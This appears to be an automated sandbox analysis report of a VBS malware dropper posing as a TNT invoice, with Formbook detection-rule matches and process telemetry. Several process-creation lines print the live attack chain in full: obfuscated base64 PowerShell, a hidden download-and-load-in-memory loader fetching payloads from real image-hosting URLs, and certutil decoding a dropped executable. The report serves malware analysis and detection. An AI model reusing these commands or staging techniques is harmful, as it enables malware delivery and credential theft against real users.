Source: 00000011.00000002.3370938043.0000000005650000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.2468777900.0000000001E10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.2683501602.00000000042B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 2616, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 5804, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@18/8@4/4

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\z0DWX[1].txt

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2528:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d2ymxetr.jg1.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs"

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SyncHost.exe, 0000000D.00000003.2628001164.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2627389766.0000000002819000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2682656755.0000000002819000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2627561379.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000002.2682656755.00000000027E3000.00000004.00000020.00020000.00000000.sdmp, SyncHost.exe, 0000000D.00000003.2628001164.0000000002819000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: TNT Invoicing_pdf.vbs	ReversingLabs: Detection: 13%
Source: TNT Invoicing_pdf.vbs	Virustotal: Detection: 10%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNT Invoicing_pdf.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"
Source: C:\Windows\System32\certutil.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir /b .png .jpg .bmp .gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Process created: C:\Windows\SysWOW64\SyncHost.exe "C:\Windows\SysWOW64\SyncHost.exe"
Source: C:\Windows\SysWOW64\SyncHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreNgDgTrevDgTreDkDgTreNwDgTre4DgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDIDgTreNQDgTre4DgTreDgDgTreNDgTreDgTre2DgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\certutil.exe "C:\Windows\System32\certutil.exe" -decode "" "C:\Users\user\AppData\Local\DesktopPic\WallP.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c dir /b .png .jpg .bmp .gif>"C:\Users\user\AppData\Local\DesktopPic\PicList.txt"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/766/978/full/new_image_vbs.jpg?1712588469', 'https://uploaddeimagens.com.br/images/004/766/979/original/new_image_vbs.jpg?1712588500'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.fg/ecarg/pohs.monocnaf//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe"	Jump to behavior
Source: C:\Program Files (x86)\PwsRxfBSXCpvIZGYzZZXOGrJOepPnlgyRvUkGDhHDB\SYYSBomrTxWSggG.exe	Process created: C:\Windows\SysWOW64\SyncHost.exe "C:\Windows\SysWOW64\SyncHost.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\SyncHost.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wiaaut.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wiatrace.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Section loaded: sspicli.dll	Jump to behavior
